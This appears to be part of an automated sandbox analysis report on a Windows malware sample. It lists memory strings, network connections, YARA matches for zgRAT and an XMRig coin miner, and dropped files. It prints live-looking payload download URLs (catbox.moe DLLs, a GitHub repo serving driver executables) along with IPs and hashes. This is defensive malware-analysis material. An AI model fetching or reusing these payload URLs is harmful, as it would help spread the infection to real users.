Source: powershell.exe, 00000008.00000002.375952185699.0000022A3090C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: RegSvcs.exe, 0000000C.00000002.378376086685.00000245CC742000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://2x.si/o3M.dllp
Source: powershell.exe, 00000008.00000002.375952185699.0000022A306E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.376013750933.0000022A40758000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.376013750933.0000022A40758000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.376013750933.0000022A40758000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: RegSvcs.exe, 0000000C.00000002.378376086685.00000245CC742000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/k541xr.dll
Source: RegSvcs.exe, 0000000C.00000002.378376086685.00000245CC742000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/kwfxr7.dll
Source: powershell.exe, 00000008.00000002.375952185699.0000022A3090C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.375952185699.0000022A3090C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/PesterXz
Source: YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED0E000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED36000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375935522158.000001F547080000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000012.00000002.376484616059.00000180E38A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED0E000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED36000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375935522158.000001F547080000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 0000000A.00000002.375975223417.0000021EBB07C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.378458637252.00000245DCC2C000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000012.00000002.376494366801.00000180F3E4C000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000012.00000002.376484616059.00000180E38A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED0E000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED36000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375935522158.000001F547080000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000012.00000002.376484616059.00000180E38A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll
Source: glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe
Source: glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe
Source: glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.execABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg
Source: powershell.exe, 00000008.00000002.376013750933.0000022A40758000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED0E000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED36000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375935522158.000001F547080000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000012.00000002.376484616059.00000180E38A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED0E000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED36000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375920946820.000001F52E761000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375935522158.000001F547080000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 0000000A.00000002.375954186503.0000021EAAA61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.378376086685.00000245CC611000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000012.00000002.376484616059.00000180E3956000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000012.00000002.376484616059.00000180E38A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED0E000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED36000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375935522158.000001F547080000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
Source: RegSvcs.exe, 0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000D.00000002.378358238334.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: RegSvcs.exe, 0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000D.00000002.378358238334.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: RegSvcs.exe, 0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000D.00000002.378358238334.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: RegSvcs.exe, 0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000D.00000002.378358238334.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard%s

Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856

Source: unknown	HTTPS traffic detected: 172.67.143.156:443 -> 192.168.11.30:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.142.26:443 -> 192.168.11.30:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.142.26:443 -> 192.168.11.30:49857 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.glmIOFfdMi.exe.3e297c0.7.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 6.2.glmIOFfdMi.exe.73e0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 6.2.glmIOFfdMi.exe.3e297c0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 6.2.glmIOFfdMi.exe.3ce97a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 6.2.glmIOFfdMi.exe.3ce97a0.2.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 6.2.glmIOFfdMi.exe.73e0000.9.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 12.2.RegSvcs.exe.245dd3ecee0.1.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 12.2.RegSvcs.exe.245dd3ecee0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 12.2.RegSvcs.exe.245dd3ecee0.1.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 13.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 13.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 13.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000006.00000002.378512569504.00000000073E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000D.00000002.378358238334.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 8344, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: AddInProcess.exe PID: 8596, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown

.NET source code contains very large array initializations

Source: PT54FFSL7ET46RASB.exe, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 1299456
Source: 5.2.RegAsm.exe.436060.0.raw.unpack, WrapperVisitorProperty.cs	Large array initialization: QueryField: array initializer size 671584

Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process Stats: CPU usage > 6%
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Process Stats: CPU usage > 6%
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process Stats: CPU usage > 6%

Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe

Code function: 10_2_00007FF93A8A3D3D NtUnmapViewOfSection,

10_2_00007FF93A8A3D3D

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Code function: 0_2_00E40B8F	0_2_00E40B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00402320	5_2_00402320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004050C0	5_2_004050C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00420470	5_2_00420470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040FCF0	5_2_0040FCF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00419D19	5_2_00419D19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041951B	5_2_0041951B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00415635	5_2_00415635
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041DEC3	5_2_0041DEC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00404F00	5_2_00404F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040CF8F	5_2_0040CF8F
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_011451D0	6_2_011451D0
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_0114E1E0	6_2_0114E1E0
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_01145530	6_2_01145530
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_01141D30	6_2_01141D30
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_0114D5C8	6_2_0114D5C8
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_0114D910	6_2_0114D910
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_011451BF	6_2_011451BF
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_0114B1C0	6_2_0114B1C0
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_011449F8	6_2_011449F8
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_0114B0B3	6_2_0114B0B3
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_01141AB8	6_2_01141AB8
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_01145520	6_2_01145520
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_056C8D18	6_2_056C8D18
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_056C9202	6_2_056C9202
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_056CAFD0	6_2_056CAFD0
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_056CDF88	6_2_056CDF88
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057B9070	6_2_057B9070
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057B0040	6_2_057B0040
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057B5600	6_2_057B5600
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057B0007	6_2_057B0007
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057BA221	6_2_057BA221
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057C1750	6_2_057C1750
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057CF752	6_2_057CF752
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057C5528	6_2_057C5528
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057C5500	6_2_057C5500
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057CF75B	6_2_057CF75B
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057C1743	6_2_057C1743
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057CCE12	6_2_057CCE12
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057C31E0	6_2_057C31E0
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057CF816	6_2_057CF816
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057C3208	6_2_057C3208
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057E5CA0	6_2_057E5CA0
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057EE920	6_2_057EE920
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057EE910	6_2_057EE910
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057ED028	6_2_057ED028
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_05D9C070	6_2_05D9C070
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_05D9AC45	6_2_05D9AC45
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_05D9BDD0	6_2_05D9BDD0
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_05D9BDE0	6_2_05D9BDE0
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_07547168	6_2_07547168
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_07582640	6_2_07582640
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_07582631	6_2_07582631
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_0759D768	6_2_0759D768
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_075DACD2	6_2_075DACD2
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057CD470	6_2_057CD470
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057CD480	6_2_057CD480
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Code function: 7_2_00007FF93A726260	7_2_00007FF93A726260
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Code function: 7_2_00007FF93A724F38	7_2_00007FF93A724F38
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Code function: 7_2_00007FF93A724D54	7_2_00007FF93A724D54
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Code function: 7_2_00007FF93A8A0FDD	7_2_00007FF93A8A0FDD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF93A730EC5	8_2_00007FF93A730EC5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF93A8039D1	8_2_00007FF93A8039D1
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A725CD3	10_2_00007FF93A725CD3
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A725BF8	10_2_00007FF93A725BF8
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A725000	10_2_00007FF93A725000
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A731C9E	10_2_00007FF93A731C9E
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A731735	10_2_00007FF93A731735
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A73186A	10_2_00007FF93A73186A
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A731070	10_2_00007FF93A731070
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A731843	10_2_00007FF93A731843
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A731DB8	10_2_00007FF93A731DB8
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A731541	10_2_00007FF93A731541
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A77FBD2	10_2_00007FF93A77FBD2
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A77EE26	10_2_00007FF93A77EE26
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A7561B5	10_2_00007FF93A7561B5
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A766A90	10_2_00007FF93A766A90
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A767F10	10_2_00007FF93A767F10
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A75F018	10_2_00007FF93A75F018
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A75F038	10_2_00007FF93A75F038
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A76F3B9	10_2_00007FF93A76F3B9
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A75CD18	10_2_00007FF93A75CD18
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A763E38	10_2_00007FF93A763E38

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe 7BFFD9CB271221C63B35A30160859EC4F2FF2BA131597D1F746C279FB53D1AD7
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe 7BFFD9CB271221C63B35A30160859EC4F2FF2BA131597D1F746C279FB53D1AD7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: String function: 00407D30 appears 55 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 9052 -ip 9052

Source: PT54FFSL7ET46RASB.exe

Static PE information: invalid certificate

Source: YZRVUYjilL.exe.5.dr

Static PE information: No import functions for PE file found

Source: PT54FFSL7ET46RASB.exe, 00000000.00000000.375873675673.0000000000472000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameVQP.exe@ vs PT54FFSL7ET46RASB.exe
Source: PT54FFSL7ET46RASB.exe, 00000000.00000002.375886817379.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PT54FFSL7ET46RASB.exe

Source: PT54FFSL7ET46RASB.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 6.2.glmIOFfdMi.exe.3e297c0.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 6.2.glmIOFfdMi.exe.73e0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 6.2.glmIOFfdMi.exe.3e297c0.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 6.2.glmIOFfdMi.exe.3ce97a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 6.2.glmIOFfdMi.exe.3ce97a0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 6.2.glmIOFfdMi.exe.73e0000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 12.2.RegSvcs.exe.245dd3ecee0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 12.2.RegSvcs.exe.245dd3ecee0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 12.2.RegSvcs.exe.245dd3ecee0.1.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 13.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 13.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 13.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000006.00000002.378512569504.00000000073E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000D.00000002.378358238334.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: RegSvcs.exe PID: 8344, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: AddInProcess.exe PID: 8596, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25

Source: PT54FFSL7ET46RASB.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
